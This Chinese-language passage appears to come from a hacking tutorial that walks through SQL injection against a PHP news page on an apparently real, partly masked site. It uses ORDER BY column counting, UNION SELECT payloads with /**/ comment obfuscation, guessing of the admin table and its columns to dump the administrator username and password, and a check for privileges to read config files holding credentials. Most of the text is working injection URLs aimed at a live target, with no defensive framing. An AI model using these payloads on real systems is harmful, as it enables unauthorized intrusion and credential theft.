我们看到当执行/**/order/**/by/**/4到4的时候返回正常说明存在4个字段。 因为我们在前面已经得到MYSQL的版本 所以已经不用判断就知道是支持union联合查询的、

    继续猜解密码
    http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4
    返回出几个数字，一会帐号密码会从显示出来 ：)

    我们来爆字段名，经过一段时间的猜解最终确定表为admin
    http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/from/**/admin  如图5

    因为返回正常说明存在该表，返回错误则不存在。 经过半天的猜解解，确定列名为“pas”“us”“id”，把相应的列名对应上面的相应的数字，数字部分就会出现我们想要的的东西了。语句是这样的，上面显示的数字为2、3我们这里替换2、3为“pas”和“us”

    id=29/**/and/**/1=2/**/union/**/select/**/1,pas,us,4/**/from/**/admin，这样在2、3部分就会出现帐号和密码了。

    另外PHP注射如果在权限够的情况下是可以读到目标网站的的源文件，可以去读一些类似CONN的文件取得敏感信息。现在来判断下这个注射点有没有权限读文件
    http://.ouou.com/newslook.php?id=29【/**/and/**/(select/**/count(*)/**/from/**/mysql.user)>0 /*】如图6